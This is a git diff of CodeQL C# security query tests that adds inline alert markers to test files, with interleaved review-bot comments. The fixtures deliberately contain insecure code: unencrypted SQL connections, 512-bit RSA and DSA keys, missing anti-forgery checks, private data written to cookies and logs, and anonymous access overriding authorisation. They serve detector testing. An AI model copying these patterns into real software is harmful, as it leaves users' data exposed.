b/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.cs index a433d5493851..755130ee32fa 100644 
--- a/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.cs @@ -41,24 +41,24 @@ public void StringInInitializer() public void TriggerThis() { // BAD, Encrypt not specified - SqlConnection conn = new SqlConnection("Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;"); + SqlConnection conn = new SqlConnection("Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;"); // $ Alert } void Test4() { string connectString = - "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd"; + "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd"; // $ Source // BAD, Encrypt not specified - SqlConnectionStringBuilder builder = new SqlConnectionStringBuilder(connectString); + SqlConnectionStringBuilder builder = new SqlConnectionStringBuilder(connectString); // $ Alert var conn = new SqlConnection(builder.ConnectionString); } void Test5() { string connectString = - "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false"; + "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false"; // $ Source // BAD, Encrypt set to false - SqlConnectionStringBuilder builder = new SqlConnectionStringBuilder(connectString); + SqlConnectionStringBuilder builder = new SqlConnectionStringBuilder(connectString); // $ Alert var conn = new SqlConnection(builder.ConnectionString); } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.expected b/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.expected index 83fdf530423a..0f5c27f64c1c 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.expected 
@@ -1,3 +1,7 @@ +#select +| InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | Connection string | +| InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | InsecureSQLConnection.cs:50:17:50:64 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" : String | InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:50:17:50:64 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" | Connection string | +| InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" : String | InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" | Connection string | edges | InsecureSQLConnection.cs:49:20:49:32 | access to local variable connectString : String | InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | provenance | | | InsecureSQLConnection.cs:50:17:50:64 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" : String | InsecureSQLConnection.cs:49:20:49:32 | access to local variable connectString : String | provenance | | 
@@ -12,7 +16,3 @@ nodes | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" : String | semmle.label | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" : String | | InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | semmle.label | access to local variable connectString | subpaths -#select -| InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | Connection string | -| InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | InsecureSQLConnection.cs:50:17:50:64 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" : String | InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:50:17:50:64 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" | Connection string | -| InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" : String | InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" | Connection string | 
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.qlref b/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.qlref
index 9809e87e73c5..cd92f9704736 100644
--- a/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.qlref
+++ b/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.qlref
@@ -1 +1,2 @@
-Security Features/CWE-327/InsecureSQLConnection.ql
\ No newline at end of file
+query: Security Features/CWE-327/InsecureSQLConnection.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/InsufficientKeySize/InsufficientKeySize.cs b/csharp/ql/test/query-tests/Security Features/CWE-327/InsufficientKeySize/InsufficientKeySize.cs
index 56f600e3544d..1d4d4efa7baa 100644
--- a/csharp/ql/test/query-tests/Security Features/CWE-327/InsufficientKeySize/InsufficientKeySize.cs
+++ b/csharp/ql/test/query-tests/Security Features/CWE-327/InsufficientKeySize/InsufficientKeySize.cs
@@ -7,21 +7,21 @@ public class InsufficientKeySize public void CryptoMethod() { // BAD: Key size is less than 128 - new RC2CryptoServiceProvider().EffectiveKeySize = 64; + new RC2CryptoServiceProvider().EffectiveKeySize = 64; // $ Alert // GOOD: Key size defaults to 128 new RC2CryptoServiceProvider(); // GOOD: Key size is greater than 128 new RC2CryptoServiceProvider().EffectiveKeySize = 256; // BAD: Key size is less than 2048. - DSACryptoServiceProvider dsaBad = new DSACryptoServiceProvider(512); + DSACryptoServiceProvider dsaBad = new DSACryptoServiceProvider(512); // $ Alert // GOOD: Key size defaults to 2048. DSACryptoServiceProvider dsaGood1 = new DSACryptoServiceProvider(); // GOOD: Key size is greater than 2048. DSACryptoServiceProvider dsaGood2 = new DSACryptoServiceProvider(2048); // BAD: Key size is less than 2048. - RSACryptoServiceProvider rsaBad = new RSACryptoServiceProvider(512); + RSACryptoServiceProvider rsaBad = new RSACryptoServiceProvider(512); // $ Alert // GOOD: Key size defaults to 2048. RSACryptoServiceProvider rsaGood1 = new RSACryptoServiceProvider(); // GOOD: Key size is greater than 2048. diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/InsufficientKeySize/InsufficientKeySize.qlref b/csharp/ql/test/query-tests/Security Features/CWE-327/InsufficientKeySize/InsufficientKeySize.qlref index 9b9050c417b4..2e460bd79e19 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-327/InsufficientKeySize/InsufficientKeySize.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-327/InsufficientKeySize/InsufficientKeySize.qlref @@ -1 +1,2 @@ -Security Features/InsufficientKeySize.ql \ No newline at end of file +query: Security Features/InsufficientKeySize.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
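Review bot: The context comment `// GOOD: Key size is greater than 2048.` sits above `new DSACryptoServiceProvider(2048)`, which is exactly 2048, so the prose misstates the boundary. With the new `// $ Alert` markers the BAD/GOOD comments become the human-readable half of a machine-checked expectation, and this line is the only boundary case shown. Reword it to `// GOOD: Key size is at least 2048.` so the comment matches what the unannotated line asserts. The same wording appears on the last context line for the RSA case, whose statement is outside the hunk and cannot be checked here.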
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-352/global/MissingAntiForgeryTokenValidation.qlref b/csharp/ql/test/query-tests/Security Features/CWE-352/global/MissingAntiForgeryTokenValidation.qlref index 38fdc5c57385..8948b9773a2d 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-352/global/MissingAntiForgeryTokenValidation.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-352/global/MissingAntiForgeryTokenValidation.qlref @@ -1 +1,2 @@ -Security Features/CWE-352/MissingAntiForgeryTokenValidation.ql \ No newline at end of file +query: Security Features/CWE-352/MissingAntiForgeryTokenValidation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-352/missing/MissingAntiForgeryTokenValidation.cs b/csharp/ql/test/query-tests/Security Features/CWE-352/missing/MissingAntiForgeryTokenValidation.cs index a86800e51529..ab258cddf3f7 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-352/missing/MissingAntiForgeryTokenValidation.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-352/missing/MissingAntiForgeryTokenValidation.cs @@ -4,7 +4,7 @@ public class HomeController : Controller { // BAD: Anti forgery token has been forgotten [HttpPost] - public ActionResult Login() + public ActionResult Login() // $ Alert { return View(); } @@ -55,7 +55,7 @@ public class DerivedUnprotectedController : UnprotectedBaseController { // BAD: No antiforgery validation on this or any base class [HttpPost] - public ActionResult NoInheritedValidation() + public ActionResult NoInheritedValidation() // $ Alert { return View(); } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-352/missing/MissingAntiForgeryTokenValidation.qlref b/csharp/ql/test/query-tests/Security Features/CWE-352/missing/MissingAntiForgeryTokenValidation.qlref index 38fdc5c57385..8948b9773a2d 100644 
--- a/csharp/ql/test/query-tests/Security Features/CWE-352/missing/MissingAntiForgeryTokenValidation.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-352/missing/MissingAntiForgeryTokenValidation.qlref @@ -1 +1,2 @@ -Security Features/CWE-352/MissingAntiForgeryTokenValidation.ql \ No newline at end of file +query: Security Features/CWE-352/MissingAntiForgeryTokenValidation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.cs b/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.cs index 675b05c29de3..21f925536d73 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.cs @@ -15,19 +15,19 @@ public class ExposureOfPrivateInformationHandler : IHttpHandler public void ProcessRequest(HttpContext ctx) { // BAD: Setting a cookie value or values with private data. - ctx.Response.Cookies["MyCookie"].Value = ctx.Request.QueryString["postcode"]; + ctx.Response.Cookies["MyCookie"].Value = ctx.Request.QueryString["postcode"]; // $ Alert Person p = new Person(); - ctx.Response.Cookies["MyCookie"].Value = p.getTelephone(); + ctx.Response.Cookies["MyCookie"].Value = p.getTelephone(); // $ Alert // BAD: Logging private data ILogger logger = new ILogger(); - logger.Warn(p.getTelephone()); + logger.Warn(p.getTelephone()); // $ Alert // BAD: Storing sensitive data in unencrypted local file using (var writeStream = File.Open("telephones.txt", FileMode.Create)) { var writer = new StreamWriter(writeStream); - writer.Write(p.getTelephone()); + writer.Write(p.getTelephone()); // $ Alert writer.Close(); } @@ -59,7 +59,7 @@ public bool IsReusable void OnButtonClicked() { ILogger logger = new ILogger(); - logger.Warn(postcode.Text); + logger.Warn(postcode.Text); // $ Alert } } 
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.expected b/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.expected
index 417692ff79ef..2d92a0387b8a 100644
--- a/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.expected
+++ b/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.expected
@@ -1,3 +1,9 @@ +#select +| ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | access to indexer | +| ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | call to method getTelephone | +| ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | call to method getTelephone | +| ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | call to method getTelephone | +| ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | Private data returned by $@ is written to an external location. 
| ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | access to property Text | edges nodes | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | semmle.label | access to indexer | 
@@ -6,9 +12,3 @@ nodes | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | semmle.label | call to method getTelephone | | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | semmle.label | access to property Text | subpaths -#select -| ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | access to indexer | -| ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | call to method getTelephone | -| ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | call to method getTelephone | -| ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | Private data returned by $@ is written to an external location. 
| ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | call to method getTelephone | -| ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | access to property Text | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.qlref b/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.qlref index 9d578d17de89..fb1a58d5f9e6 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.qlref @@ -1 +1,2 @@ -Security Features/CWE-359/ExposureOfPrivateInformation.ql \ No newline at end of file +query: Security Features/CWE-359/ExposureOfPrivateInformation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-384/AbandonSession.cs b/csharp/ql/test/query-tests/Security Features/CWE-384/AbandonSession.cs index d674b33a0365..0cbc40c0c168 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-384/AbandonSession.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-384/AbandonSession.cs @@ -8,7 +8,7 @@ public void ProcessRequest(HttpContext ctx) if (FormsAuthentication.Authenticate("username", "password")) { - ctx.Session["foo"] = "bar"; // BAD: Session has not been abandoned + ctx.Session["foo"] = "bar"; // BAD: Session has not been abandoned // $ Alert ctx.Session.Abandon(); ctx.Session["foo"] = "bar"; // GOOD: Session is abandoned } 
@@ -48,9 +48,9 @@ public void ProcessRequest(HttpContext ctx) if (Membership.ValidateUser("username", "password")) { - ctx.Session["foo"] = "bar"; // BAD: Session not abandoned + ctx.Session["foo"] = "bar"; // BAD: Session not abandoned // $ Alert } - ctx.Session["foo"] = "bar"; // BAD: here as well + ctx.Session["foo"] = "bar"; // BAD: here as well // $ Alert } public bool IsReusable => true; diff --git a/csharp/ql/test/query-tests/Security Features/CWE-384/AbandonSession.qlref b/csharp/ql/test/query-tests/Security Features/CWE-384/AbandonSession.qlref index f67c9a36e202..c3ac664edb29 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-384/AbandonSession.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-384/AbandonSession.qlref @@ -1 +1,2 @@ -Security Features/CWE-384/AbandonSession.ql \ No newline at end of file +query: Security Features/CWE-384/AbandonSession.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/CodeAddedHeader/MissingXFrameOptions.qlref b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/CodeAddedHeader/MissingXFrameOptions.qlref index b8a963200e57..d0d38c4b0117 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/CodeAddedHeader/MissingXFrameOptions.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/CodeAddedHeader/MissingXFrameOptions.qlref @@ -1 +1,2 @@ -Security Features/CWE-451/MissingXFrameOptions.ql +query: Security Features/CWE-451/MissingXFrameOptions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/MissingXFrameOptions.qlref b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/MissingXFrameOptions.qlref index b8a963200e57..5a653b7ada09 100644 
--- a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/MissingXFrameOptions.qlref
+++ b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/MissingXFrameOptions.qlref
@@ -1 +1 @@
-Security Features/CWE-451/MissingXFrameOptions.ql
+query: Security Features/CWE-451/MissingXFrameOptions.ql
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/WebConfigAddedHeader/MissingXFrameOptions.qlref b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/WebConfigAddedHeader/MissingXFrameOptions.qlref
index b8a963200e57..d0d38c4b0117 100644
--- a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/WebConfigAddedHeader/MissingXFrameOptions.qlref
+++ b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/WebConfigAddedHeader/MissingXFrameOptions.qlref
@@ -1 +1,2 @@
-Security Features/CWE-451/MissingXFrameOptions.ql
+query: Security Features/CWE-451/MissingXFrameOptions.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/WebConfigAddedHeaderInLocation/MissingXFrameOptions.qlref b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/WebConfigAddedHeaderInLocation/MissingXFrameOptions.qlref
index b8a963200e57..d0d38c4b0117 100644
--- a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/WebConfigAddedHeaderInLocation/MissingXFrameOptions.qlref
+++ b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/WebConfigAddedHeaderInLocation/MissingXFrameOptions.qlref
@@ -1 +1,2 @@
-Security Features/CWE-451/MissingXFrameOptions.ql
+query: Security Features/CWE-451/MissingXFrameOptions.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
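Review bot: The `postprocess: utils/test/InlineExpectationsTestQuery.ql` line is missing from the NoHeader reference, although the sibling CodeAddedHeader, WebConfigAddedHeader and WebConfigAddedHeaderInLocation references all receive it, so the NoHeader case stays checked by its `.expected` file alone. The same applies to ASPNetDirectoryListing.qlref, RequireSSL/HttpCookiesCorrect/RequireSSL.qlref and RequireSSL/RequireSSLMissing/RequireSSL.qlref further down, which also get only the `query:` line. The reason is not visible in the patch; presumably the results in these directories fall in configuration files that cannot carry a `// $ Alert` comment. If that is the case, saying so in the commit message would keep a later reader from taking the omission for an oversight; if it is not, the `postprocess:` line should be added to these four files as well.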
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-539/PersistentCookie/PersistentCookie.cs b/csharp/ql/test/query-tests/Security Features/CWE-539/PersistentCookie/PersistentCookie.cs index 8370fe93ba0d..c64e6d6a043f 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-539/PersistentCookie/PersistentCookie.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-539/PersistentCookie/PersistentCookie.cs @@ -4,8 +4,8 @@ class PersistentCookie { void M(System.Web.HttpCookie cookie) { - cookie.Expires = DateTime.Now.AddMonths(12); // BAD + cookie.Expires = DateTime.Now.AddMonths(12); // BAD // $ Alert cookie.Expires = DateTime.Now.AddMinutes(3); // GOOD - cookie.Expires = DateTime.Now.AddSeconds(301); // BAD + cookie.Expires = DateTime.Now.AddSeconds(301); // BAD // $ Alert } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-539/PersistentCookie/PersistentCookie.qlref b/csharp/ql/test/query-tests/Security Features/CWE-539/PersistentCookie/PersistentCookie.qlref index 1d2111ac3fe7..d321b853086e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-539/PersistentCookie/PersistentCookie.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-539/PersistentCookie/PersistentCookie.qlref @@ -1 +1,2 @@ -Security Features/PersistentCookie.ql \ No newline at end of file +query: Security Features/PersistentCookie.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-548/ASPNetDirectoryListing.qlref b/csharp/ql/test/query-tests/Security Features/CWE-548/ASPNetDirectoryListing.qlref index 40d1fce18b5c..95e9bc80fe7f 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-548/ASPNetDirectoryListing.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-548/ASPNetDirectoryListing.qlref @@ -1 +1 @@ -Security Features/CWE-548/ASPNetDirectoryListing.ql \ No newline at end of file +query: Security Features/CWE-548/ASPNetDirectoryListing.ql 
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/AddedInCode/RequireSSL.qlref b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/AddedInCode/RequireSSL.qlref
index 73523f94fc09..1a762e07498e 100644
--- a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/AddedInCode/RequireSSL.qlref
+++ b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/AddedInCode/RequireSSL.qlref
@@ -1 +1,2 @@
-Security Features/CWE-614/RequireSSL.ql
\ No newline at end of file
+query: Security Features/CWE-614/RequireSSL.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/AddedInForms/RequireSSL.qlref b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/AddedInForms/RequireSSL.qlref
index 73523f94fc09..1a762e07498e 100644
--- a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/AddedInForms/RequireSSL.qlref
+++ b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/AddedInForms/RequireSSL.qlref
@@ -1 +1,2 @@
-Security Features/CWE-614/RequireSSL.ql
\ No newline at end of file
+query: Security Features/CWE-614/RequireSSL.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/RequireSSL.qlref b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/RequireSSL.qlref
index 73523f94fc09..58ec5162739a 100644
--- a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/RequireSSL.qlref
+++ b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/RequireSSL.qlref
@@ -1 +1 @@
-Security Features/CWE-614/RequireSSL.ql
\ No newline at end of file
+query: Security Features/CWE-614/RequireSSL.ql
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/RequireSSL.qlref b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/RequireSSL.qlref index 73523f94fc09..58ec5162739a 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/RequireSSL.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/RequireSSL.qlref @@ -1 +1 @@ -Security Features/CWE-614/RequireSSL.ql \ No newline at end of file +query: Security Features/CWE-614/RequireSSL.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/CommentController.cs b/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/CommentController.cs index d446c7ed4864..2508a7c159c3 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/CommentController.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/CommentController.cs @@ -12,7 +12,7 @@ public CommentController(IAuthorizationService authorizationService) } // BAD: Any user can access this. - public ActionResult Edit1(int commentId, string text) + public ActionResult Edit1(int commentId, string text) // $ Alert { editComment(commentId, text); return View(); @@ -39,7 +39,7 @@ public ActionResult Edit3(int commentId, string text) // BAD: The AllowAnonymous attribute overrides the Authorize attribute [Authorize] [AllowAnonymous] - public ActionResult Edit4(int commentId, string text) + public ActionResult Edit4(int commentId, string text) // $ Alert { editComment(commentId, text); return View(); diff --git a/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/InsecureDirectObjectReference.qlref b/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/InsecureDirectObjectReference.qlref index 4756d5a76a4f..8fb76298ac58 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/InsecureDirectObjectReference.qlref 
+++ b/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/InsecureDirectObjectReference.qlref @@ -1 +1,2 @@ -Security Features/CWE-639/InsecureDirectObjectReference.ql \ No newline at end of file +query: Security Features/CWE-639/InsecureDirectObjectReference.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/MiscTestControllers.cs b/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/MiscTestControllers.cs index 503b2955933d..5ff2e2187684 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/MiscTestControllers.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/MiscTestControllers.cs @@ -23,7 +23,7 @@ public class AController : BaseController { public class BaseAuthController : Controller { // BAD - A subclass of AllowAnonymous is used [MyAllowAnonymous] - public virtual ActionResult EditAnon(int id) { return View(); } + public virtual ActionResult EditAnon(int id) { return View(); } // $ Alert } public class BController : BaseAuthController { @@ -31,7 +31,7 @@ public class BController : BaseAuthController { public ActionResult Edit3(int id) { return View(); } // BAD - MyAllowAnonymous is inherited from overridden method - public override ActionResult EditAnon(int id) { return View(); } + public override ActionResult EditAnon(int id) { return View(); } // $ Alert } [AllowAnonymous] @@ -42,7 +42,7 @@ public class BaseAnonController : Controller { public class CController : BaseAnonController { // BAD - AllowAnonymous is inherited from base class and overrides Authorize [Authorize] - public ActionResult Edit4(int id) { return View(); } + public ActionResult Edit4(int id) { return View(); } // $ Alert } [Authorize] 
